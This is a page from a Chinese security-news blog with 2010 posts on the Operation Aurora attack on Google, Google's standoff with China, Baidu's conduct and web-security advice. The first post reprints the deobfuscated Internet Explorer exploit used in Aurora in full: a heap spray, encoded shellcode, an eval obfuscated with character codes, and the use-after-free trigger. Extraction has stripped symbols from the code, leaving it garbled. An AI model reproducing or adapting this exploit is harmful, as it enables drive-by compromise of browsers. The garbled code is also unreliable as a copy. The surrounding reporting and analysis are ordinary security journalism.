行业新闻

2010, January 20, 11:06 PM

极光行动:攻击Google的代码曝光

No Comments | 行业新闻 | by bigsea | 1884 Views.

TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致google被攻击的声明,承认McAfee所说的ie漏洞才是祸源。

文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下:

【去混淆后的代码】

 

Evals

  • var n = unescape("%u0c0d%u0c0d");
while (n.length = 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i  200; i ++ ){
  x[i] = n + sc;
}
    (repeated 1 time)

Writes

 

  1. htmlscriptvar sc = unescape("  
  2. %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805  
  3. %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2  
  4. %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053  
  5. %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8  
  6. %ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8  
  7. %u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2  
  8. %ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f  
  9. %udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7  
  10. %ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727  
  11. %u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6  
  12. %u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923  
  13. %ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2  
  14. %ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8  
  15. %u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8  
  16. %ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820  
  17. %udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8  
  18. %u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854  
  19. %ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84  
  20. %ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4  
  21. %ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153  
  22. %u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30  
  23. %ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e  
  24. %u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b  
  25. %u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb  
  26. %u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c  
  27. %u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498  
  28. %ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0  
  29. %ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc  
  30. %u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8  
  31. %u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038  
  32. %ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e  
  33. %u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727  
  34. %u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703  
  35. %uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653  
  36. %udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5  
  37. %u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb  
  38. %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be  
  39. %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7  
  40. %ubcb9%ub2f6%ubfa8%u00d8");  
  41. var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,   
  42. 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,   
  43. 728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,   
  44. 350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,   
  45. 805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,   
  46. 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,   
  47. 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,   
  48. 735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,   
  49. 735, 651, 427, 770, 301, 805, 693, 413, 875);  
  50. var arr = new Array;  
  51. for (var i = 0; i  sss.length; i ++ ){  
  52.   arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cccc=cc.replace(/ ,/ g, ""  
  53.   );  
  54.   cccc = cc.replace(/@/g, ",");  
  55.   eval(cc);  
  56.   var x1 = new Array();  
  57.   for (i = 0; i  200; i ++ ){  
  58.     x1[i] = document.createElement("COMMENT");  
  59.     x1[i].data = "abc";  
  60.   }  
  61.   ;  
  62.   var e1 = null;  
  63.   function ev1(evt){  
  64.     e1 = document.createEventObject(evt);  
  65.     document.getElementById("sp1").innerHTML = "";  
  66.     window.setInterval(ev2, 50);  
  67.   }  
  68.   function ev2(){  
  69.     p = "  
  70. \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
  71. \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
  72. \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";  
  73.     for (i = 0; i  x1.length; i ++ ){  
  74.       x1[i].data = p;  
  75.     }  
  76.     ;  
  77.     var t = e1.srcElement;  
  78.   }  
  79. /scriptspan id="sp1"IMG SRC="aaa.gif" onload="ev1(event)"/span/body/html  

(repeated 1 time)

微软也发布了对这个漏洞的更新分析,表明Windows XP上的IE 6最为危险。值得一提的是,文章特别感谢了CSDN专家博客暨《程序员》杂志专栏作者、微软中国的褚诚云。我们会尽快邀请褚诚云写出更深入的分析文章。

还有专家用视频演示了攻击过程。

此前,《连线》杂志文章给出了大量攻击细节。

文章引述McAfee公司的话,说(攻击Google的)黑客使用了前所未有的战术,组合了加密、隐秘编程技术和IE中的未知漏洞,意图是窃取Google、Adobe和许多其他大公司的源代码。

该公司威胁研究副总裁Dmitri Alperovitch说:在国防工业之外,我们从未见过商业行业的公司遭受过如此复杂程度的攻击。

Alperovitch说,攻击者使用了十几种恶意代码和多层次的加密,深深地挖掘进了公司网络内部,并巧妙掩盖自己的活动。在掩饰攻击和防范常规侦测方法上,他们的加密非常成功。我们从未见过这种水平的加密。非常高超。

McAfee之所以将这种攻击命名为Auroro(极光),是因为他们发现,黑客在将恶意代码编译为可执行文件时,编译器将攻击者机器上的路径名插入代码中。

在IE漏洞被曝光后,微软很快发布了针对性的安全建议书。而McAfee也在其产品中增加了侦测这种攻击所用恶意代码的功能。

虽然最初的攻击始自公司雇员访问恶意网站,但是研究人员还在试图确定网站的URL是通过邮件、聊天程序还是其他方式,比如Facebook或者其他社会化网站。

当用户访问恶意网站的时候,他们的IE浏览器将被袭击,自动而且秘密地下载一系列恶意代码到计算机中。这些代码就像俄罗斯套娃那样,一个跟着一个地下载到系统中。

Alperovitch表示,最初的攻击代码是经过三次加密的shell code,用来激活漏洞挖掘程序。然后它执行从外部机器下载的程序,后者也是加密的,而且会从被攻击机器上删除第一个程序。这些加密的二进制文件将自己打包为几个也被加密的可执行文件。

其中一个恶意程序会打开一个远程后门,建立一个加密的秘密通道,伪装为一个SSL链接以避免被侦测到。这样攻击者就可以对被攻击机器进行访问,将它作为滩头阵地,继续进攻网络上的其他部分,搜索登录凭据、知识产权和其他要找的东西。

McAfee因参与攻击调查,从被攻击公司那里得到了攻击所用的一些恶意代码副本,并在几天前加强了自己的产品。

对于另一家安全企业iDefense之前所说的有些攻击使用了Trojan.Hydraq木马,Alperovitch表示,他发现的恶意代码此前任何反病毒厂商都不知道。

iDefense还说攻击者使用了恶意PDF附件和Adobe PDF程序的漏洞,而Alperovitch说,他调查的公司里没有发现这种情况。但他表示攻击不同公司的方法可能不同,不限于IE漏洞。

当黑客进入系统后,他们将数据发送给位于美国伊利诺依州和得克萨斯州以及中国台湾的指挥控制服务器。Alperovitch所没有识别到美国的系统牵涉到这次攻击,也没有提到攻击者的战果。但Rackspace报告他们无意中在攻击中发挥了少量作用。而iDefense则表示攻击者的目标是许多公司的源码库,而且很多情况下都成功得手。

Alperovitch说攻击看上去是从12月15日开始的,但也有可能更早。似乎结束于1月4日,那一天,用来与恶意代码传输数据的指挥控制服务器被关闭。

他说:我们不知道服务器是由攻击者关闭的,还是其他组织关闭的。但是从那时起,攻击停止了。

Aperovitch还指出,攻击的时机非常好,是在假日期间,公司的运营中心和安全响应团队人手很少。攻击的复杂程度令人印象深刻,是那种此前仅针对国防工业的攻击类型。一般对于商业部门,攻击只是为了获取财务方面的信息,通常是通过SQL注入攻击公司的网站,或者攻击公司不安全的无线网络。网络罪犯一般不会花大量的时间把攻击精雕细刻到如此程度,每个方面都采取混淆/加密防范。

McAfee还掌握了更多攻击细节,但目前不准备公布。他们已经与美国执法部门合作,并将这一问题告知美国各级政府。

阅读全文

Tags: 极光行动 , ie漏洞 , google , 安全

2010, January 18, 2:27 PM

Google,中国,及其新的有利地位--附哈佛英文原文

No Comments | 行业新闻 | by bigsea | 1662 Views.

近日,Google退华事件引来各方评论,有技术方面的,政治方面的,当然也有商业方面的,Havas Media Lab的主管Umair Haque也在哈佛商学院评论网站上发文表达了自己的看法。

以下为节选翻译:

一座丘陵,一个峡谷,和一个云雾缭绕的山峰。闭上你的眼睛,想象一个倾斜的字母“M”。那就是有利地位新的形状。而最近Google与中国的小冲突就是最好的例子。

一边是资本主义工业时代;另一边,则是下一代资本主义的有利地位。二十世纪和二十一世纪的鸿沟,将其明显的区别开来的。

对垄断和完全控制的追求那已经是上一时期的优势,但中国仍像激光束般盯着这些。中国的这些行为是商学院教科书上的经典黑色艺术。通过大量的分配,大量的诉讼,更强的排外性,廉价的快速消费品,庞大的现金储蓄,导致了优势的增加。

但是目前的优势所在已经改变了。道德优势成为了新的有利地位。这无关于是否获得更多,这关乎做的更好。这无关于出口保护策略,向消费者和生产者施加 压力,让他们买这买那。而这是关乎让人民,群众,社会真正的富裕起来。这无关于不关心他人,而是关乎关爱的更多。这无关于无情冷酷,而关乎真诚、可靠。

这才是Google不愿被中国的政策玩弄的原因。道德优势并不仅仅可以打造更强的品牌、让诚信度更高。还能为打造更好的组织,市场和经济立下基础:

更强的商业,更多没有被工作所麻木的热情的群众。
更强的目标,为了更高的需求而奋斗,而不是降低目标。
更强的战略,对二十世纪类的高压政策和边缘政策有更大的反弹力。
能创造更有意义的价值。
更强的管理,更着重于长远利益。
能选择更好的投资者——诚信的,忠诚的长期投资者,而不仅仅是为了快速赚钱的投机者。
更强的经济,而非使经济衰退,这可以让人们享受一个更诚信的繁荣的社会生活。
二十世纪的优势能让中国造就一些诸如微软、福特和Gaps这样的企业(一些工业时代的企业,生产一些工业时代的产品,并按工业时代的规则经营)。我们现在知道这些故事的结局了,因为我们现在生活在一个经济,政治,社会和自然世界停滞的年代。

Google的成功在于他的企业文化中道德占有优势。而对某些事物妥协对于Google伤害巨大:诸如品牌,战略,引起内讧,企业价值的降低。而更严重 的是,它让Google陷入竞争的恶性循环。Google应该更多的参与政府招标,还是做一个类似于百度那样的国家拥护的冠军?

道德方面的优势有可能是优势的最终成因。这是为什么更好的分配、产品、市场、定价形成的原因,而这些正是优势产生的直接原因。Jim Chanos的投资报告说到:离开道德优势,我们无法创造新的企业价值,而旧的企业价值不是长久之计。

是时候来改朝换代了。今日的挑战并非是盲目的创建一个国家、企业。这是为了一个高速连接的世界而重新构思的新体系。谋求一个道德优势是建设性的资本主义的测试。Google做到了。而中国就像迪拜,俄罗斯和以前的特大企业一样,并没有成功。

google-china1-300x225.jpg 大小: 19.4 K 尺寸: 300 x 225 浏览: 1 次 点击打开新窗口浏览全图

附上哈佛商业评论原文

Google, China, and the New High Ground of Advantage

A hill, a giant chasm, and a cloud-covered peak. Close your eyes and picture a lopsided "M" for a second. That's the new landscape of advantage. And the recent skirmish between Google and China is its best example yet.

On one side is the old high ground of the industrial era capitalism; on the other, the new high(er) ground of next-generation capitalism. The yawning chasm in between them is the gap between the 20th century and the 21st.

Currency intervention, breaking Copenhagen, crackdowns , collusion, corruption, coercion, and censorship: China's ongoing bad behavior as global citizen is, when we connect the dots, the gigantic elephant in the world's boardroom. What's driving it?

The quest for monopoly, monopsony, and control. That's yesterday's high ground, and China's focused like a laser beam on it. China's moves are the textbook stuff of b-school's blackest arts. Through larger distribution, fiercer litigation, greater exclusivity, cheaper and faster production, a bigger cash pile, advantage is gained.

But the high ground has shifted. The new high ground is an ethical edge. It's not about having more; it's about doing better. It's not about protecting exports, pressuring buyers and suppliers, price discriminating against the powerless, and programming consumers to buy, buy, buy — it's about making people, communities, and society authentically better off. It's not about caring less — but caring more. It's not about ruthlessness. It's about mindfulness.

That's the real lesson of Google's refusal to play by China's rules. An ethical edge doesn't just build stronger brands, though added cred is a certainly a benefit. Rather, it lays new foundations for better organizations, markets, and economies:

It builds stronger businesses, full of more passionate people, who aren't deadened by their work.
It builds stronger purpose, striving towards a higher calling — not just a lowest common denominator.
It builds stronger strategies, more resilient to 20th century-style coercion and brinksmanship.
It builds thicker, more meaningful value.
It builds stronger management, more focused on the long-run.
It selects better investors — engaged, committed, long-run investors, not just speculators looking for a quick buck.
And it builds stronger economies, that can, instead of stagnating, enjoy an authentic prosperity.
The 20th century high ground might let China build a few dozen Microsofts, Fords, and Gaps: industrial-era companies that make industrial-era stuff — and play by industrial-era rules. Yawn. We know how that story ends, because we're living it: an economy, polity, society, and natural world in stagnation and decline. Dear Wen Jiabao: want fries with that Zombieconomy?

The only way to step past the industrial era's zombified endgame is the new high ground, because only an ethical edge can do all the good stuff above. The old high ground was built for 20th century economics: sell more junk, earn more profit, "grow" — and then crash. An ethical edge operates at a higher economic level. It is concerned with what we sell, how profits are earned, and which authentic, human benefits "grow." It's a concept built for the economics of an interdependent world.

It's an ethical edge (no, not ethical perfection) that's always been at the heart of Google's disruptive success. Compromising its ethical edge cost Google in all the ways above, damaging its brand, diluting its purpose, causing internal strife, creating thinner value. Most damaging, compromising its ethical edge cost left Google trapped in an impossible, vicious cycle of competitive dynamics: to "compete," should it do the government's bidding even more than quasi-state-sponsored champions, like Baidu?

Wall Street, in typically myopic fashion, thinks Google's crazy — who doesn't want to make a buck? But the Street gets real economics less than my pet hamster does. Not every marginal dollar is created equal. The benefits from the effects above steeply outweigh the pennies Google was earning. Instead, a Google that doesn't play by China's rules is a better business, which creates more thicker, sustainable, meaningful value. And, increasingly, it's thick value that the smart money rewards — and reaps lasting rewards from. No wonder, then, that Wall Street legend Jim Chanos is betting against China's unsustainable, artificial growth.

An ethical edge just might be the ultimate cause of advantage. It's how better distribution, production, marketing, and pricing — all just proximate causes of advantage — ultimately happen. Jim Chanos's investment thesis says: without an ethical edge, new value cannot be created — old value can only be shuffled around (hi, Wall Street).

Ethical edge is advantage reconceived for the 21st century. It's an institutional innovation: the institution of "advantage" rebuilt for a threadbare, fraying, global economy. It's a radical new definition of "advantage" that blows past the stale, tired idea of competitive advantage.

It's time for a great reboot. Today's great challenge isn't blindly building countries, companies, or households on a broken set of institutions. It is reimagining new institutions for a hyperconnected world. Answering that challenge begins, from my tiny perspective, with an ethical edge as the cornerstone of every kind of organization. Seeking an ethical edge is the truest test of a Constructive Capitalist. Google just passed it. China — like Dubai, Russia, and yesterday's mega-corporations — is failing it spectacularly.

So here's the single question everyone should be asking. The old high ground is the new low ground. Yesterday's mountain is today's valley. Are you ascending to the new high ground?

Fire away in the comments with questions, thoughts, or examples.
 

 

http://blogs.hbr.org/haque/2010/01/google_china_and_the_new_high.html

阅读全文

Tags: 哈佛商业评论 , harvard business , google

2010, January 18, 1:55 PM

评论:缺乏道德感的百度不会真正幸福

No Comments | 行业新闻 | by bigsea | 1256 Views.

“幸福来得太快。”在谷歌尚未明确是否就此退出中国市场之际,百度员工已经赤??地趁火打劫:如今百度负责广告销售的员工一早来到公司后的第一件事,就是列出谷歌的广告客户名单,开始逐个联系,百度人得意的说,“我们内部调侃这是捡钱计划。”差不多同时,百度首席产品设计师孙云丰在博客上公开撰文辱骂:(关于谷歌退出中国)“整个事情给我的唯一感受,就是恶心”、“证明google是个市侩分子。”

姑且不论孙云丰的观点是非对错,如果孙云丰代表百度骂谷歌,那他就严重地缺乏职业道德,辱骂竞争对手显然不是一家公众上市公司高管之所为能事;如果孙云丰代表自己骂谷歌公司,那么就有义务接受谷歌用户的回应和批评。可惜的是孙云丰一方面宣称自己观点毫无错误,另一方面,他又赶紧删掉了自己的文章并且四处要求删贴。也有人说删贴未必是他自己的意愿。那么,作为宣称“有道德感”的百度员工,孙云丰不应该屈从别人的意见删掉自己认为正确的东西。作为百度高管,孙云丰更不应该允许百度公关去打电话要求别人删贴。

新浪微博上有网友评论说,“单从商业价值和经济利益方面考量,都可以看出Google的不作恶,并不是作秀的口号。对于一个靠信息有序化赚钱的公司,必须要不作恶才行。百度正好相反,必须要作恶才行。”这句话说到点子上,谷歌退就退吧,百度未必就能继续一股独大。即使暂时抢下更大份额,如果不改变或者提升哪怕是一个世侩也该有的道德底气,百度终有一天遭世人唾弃。

当然,曾经我也经常使用百度,享受其便利搜索的同时也关注其成长。我曾一直很期待百度能成为一家负有责任感的道德公司,就像他们新编《壹百度》里所鼓吹的那样。遗憾的是,从百度高管到员工,似乎都没和这家公司一样完成这种道德上的转变。不要武断地以为我是在挟公器而泄私愤。以我跑IT线的最近两年跟百度人打交道的直观感受就是,百度严重地缺乏公关沟通原则并且势利:为了掩盖其负面新闻,百度公关可以不惜千里飞来又是许诺又是找高层拉关系;一旦目的达到或者遭拒,其公关团队转瞬就变得傲慢十足。

从最近频频曝出网友投诉百度上充斥恶意诽谤攻击他人名誉的网页链接可见一斑。百度不仅没有履行道德公司所必须的制止不良信息散播责任,却是为了暖味眼球和暴利空间,选择最大限度地纵容和助长这类恶意传播扩大化,给被侵权人带来更大的伤害。可悲的是,百度不以为耻反以为荣,似有将此恶习死扛到底的趋势。

“百度搜索引擎的核心价值就在于在网络空间里自由地抓取信息,靠信息有序化进行商业运作。”百度公关高管们不止一次地辩称,技术上无法屏蔽掉恶意诽谤信息。但如果以此逃避散播诽谤网贴的责任,那么,累积起百度巨大财富将李彦宏推上首富的百度竞价排名又作何解?那些活跃在百度线上线下,以收钱删贴的公司又是如何的生存?更近的例子是,如今百度上搜索孙云丰骂谷歌的贴子,缘何毫无例外地全部显示“页面无法访问”?百度何必如此掩耳盗铃。

百度原本可以更幸福的,他完全可以把商业价值建立在一个正确的价值观之上。谷歌的退出,无疑让百度迎来商业搜索史上可遇不可求的机遇,很不幸,百度根本不愿这么做。

作者:戴远程

阅读全文

Tags: baidu , google

2010, January 16, 11:04 PM

China, Google and Web Security

No Comments | 行业新闻 | by bigsea | 1337 Views.

Google recently announced that its China based location was the victim of an attack that targeted and compromised a critical internal system used to track the email accounts of those on China’s watch list. The system was designed to comply with government warrants for information concerning Chinese human rights activists. Some suspect China of targeting this specific system to circumvent the official warrant process in order to collect data on other Chinese citizens [1].

More alarmingly, this attack was not exclusively directed at Google. In all, at least 34 companies including Yahoo, Symantec, Northrop Grumman, Dow Chemical, Washington-based think tanks, and assorted human rights advocacy groups were compromised by the spear phishing attack [2].
At first rumored to be another Adobe flaw, closer examination by McAfee Labs revealed that the attack (code named “Aurora”) was actually a sophisticated zero-day vulnerability exploit against Microsoft’s Internet Explorer [3].
What should be most worrisome is not the zero-day in all versions of IE, but the new crop of “advanced persistent threats” that are siphoning money and intellectual property. These APTs are professionally organized, have extensive funding and employ smart people. The result: triple encrypted shell code which downloads multiple encrypted binaries used to drop an encrypted payload on a target machine which then establishes an encrypted SSL channel to connect to a command and control network [4]. This is serious stuff.
Only a few years ago the majority of web-based attacks seemed to be launched by individuals or small groups to collect credit card information. These attacks had seriously consequences, but the magnitude of the losses and the organization of the black market economy were still child’s play by today’s standards.
Current threats from the Eastern bloc are directed at massive monetary gain - probably in the area of tens of millions of dollars [5]. China appears hell bent on stealing state secrets and intellectual property from both governments and private business alike. The stakes are much higher, and the bad guys are much more capable of pulling off the heist.
China
We have known for a long time that China is engaged in actively sponsoring espionage. However, the focused targeting of private business is a newer, more sophisticated and lucrative threat. These spear fishing attacks are intensely researched and aimed at top level executives, and will become more common as time passes.
In a directly related point, consider the curious appearance of a new website called iiScan. This service (based in China) offers to scan your web application for vulnerabilities - for FREE. Just sign up and point their software to your website, and they will, ‘figure out’ how vulnerable to an attack you might be. After the scan is done, they will email you a PDF based report to your email account.
Wow. This service sounds like an overwhelmingly bad idea. It doesn’t take much to imagine all the things that could go wrong in this scenario, even if the Chinese government didn’t directly fund targeted attacks, IE didn’t have multiple zero-day exploits, and a proof of concept embedded malicious PDF exploit had not just been released. Can you say ‘Beijing Cocktail’?
It might very well turn out that NOSEC Technologies Co., Ltd. (the company behind iiScan) may be legitimate, or at least may have started out that way. Even if they are not actively attacking websites, it shouldn’t take long for them to become a high profile target for either private hackers, or for the Chinese government itself. What would be a better target than a database full of public websites and their known vulnerabilities? These sites, if not already compromised by iiScan, could be used as command and control drones, payload hosts, pieces of a distributed file-system, or merely SPAM relay channels.
Education and Armament
Everyday adds more proof that web application threats are being crafted by motivated professional organizations with deep pockets. Security needs to be taken very seriously, practiced diligently, and all users need be paranoid when surfing the web. This is especially important because the media is very cautious to report all the gory details of the real impact of cybercrime [6].
Installing preventative software is a good idea, too. Some of the latest tools and devices may help to prevent drive-by malware, spear phishing payloads, etc. Install Firefox and use plug-ins that flag suspected malware host sites. Use a personal web proxy, and restrict evil IPs. You can get the most comprehensive list of Korean and Chinese blocks (including iptables, htaccess files, dns zones, etc) from this page. Above all, stop clicking on those emails from your least technical friends that include an attached PowerPoint or PDF file to deliver a punch line. The villains take the Internet very seriously, and so should you.

http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/01/15/china-google-and-web-security.aspx

阅读全文

Tags: web安全 , hp , google , 安全

2010, January 16, 2:49 PM

McAfee:导致谷歌遭受攻击的IE漏洞攻击代码已遭公开

1 Comment | 行业新闻 | by bigsea | 1225 Views.

据McAfee周五表示,导致谷歌电子邮件系统被大陆神秘黑客攻破的IE浏览器0-day漏洞最近已经被泄露到了网上.与此同时,德国联邦安全局也与同日发布了一则声明,提醒德国人民在IE推出安全补丁前暂时不要使用这款浏览器.

McAfee的CTO George Kurtz在自己博客上的发帖显示:他们的研究人员在邮件列表中发现了有关的攻击代码,并确认称目前至少有一个网站已经公布了有关的漏洞攻击代码.他并表示:"McAfee本周早些时候便已经发现了这样的攻击代码,并已经将这些代码提交给了微软.不过这次泄露出来的攻击代码和我们提交的内容竟然完全一样."

"这些代码被公布于众之后,类似的针对IE的攻击会很快在网上流传开来."Kurtz写道:"不法分子可以利用这条公开的代码来攻击Windows操作系统。而且不少流行的渗透测试工具中也已经加入了测试这个漏洞的功能。"

本周四微软就该漏洞发布了警告信息,并称他们正在修补这个漏洞。根据微软的警告,该漏洞可影响包括Windows7在内的各款流行Windows操作系统中的IE6/7/8程序.他们还宣称使用IE6的用户将是漏洞攻击者的首要攻击对象.

谷歌本周二曾对外宣布称发现有大陆黑客正利用这种漏洞对自己和其它几家美国公司发起攻击,另外谷歌同时还表示攻击的目标还包括多位私人用户的Gmail邮箱.

据谷歌表示,去年12月份中期他们便发现有此类攻击行为出现,尽管谷歌并没有明确指出这种攻击是否是在指使下进行的.但他们随后表示,由于遭受了这种肆意攻击,因此他们准备退出中国市场.据熟知此事件内情的人士表示,这次针对谷歌的攻击所使用的攻击代码,与不久前针对几家美国公司所发起的攻击非常类似。

据透露,在这次攻击谷歌的事件中,有超过30家的美国硅谷企业开发的专利源代码被窃。Adobe公司已经确认称自己也是受害者之一,另据透露雅虎,赛门铁克,Juniper,诺斯罗普格鲁曼(Northrop Grumman)以及陶氏化学公司(Dow Chemical)也是这次攻击的受害者。

McAfee表示,在分析了这些ie漏洞攻击代码之后,他们发现攻击者将这次攻击行动命名为“曙光行动”(Aurora),同时这次攻击所使用的手法可谓相当高明。

CNBeta编译
原文:cnet
 

shuguang.jpg(缩略图)

shuguang.jpg 大小: 62.25 K 尺寸: 350 x 234 浏览: 3 次 点击打开新窗口浏览全图

阅读全文

Tags: ie漏洞 , google攻击;曙光行动 , google , 安全

Total: 230Page 3 of 46‹ Prev1234567Next ›Last »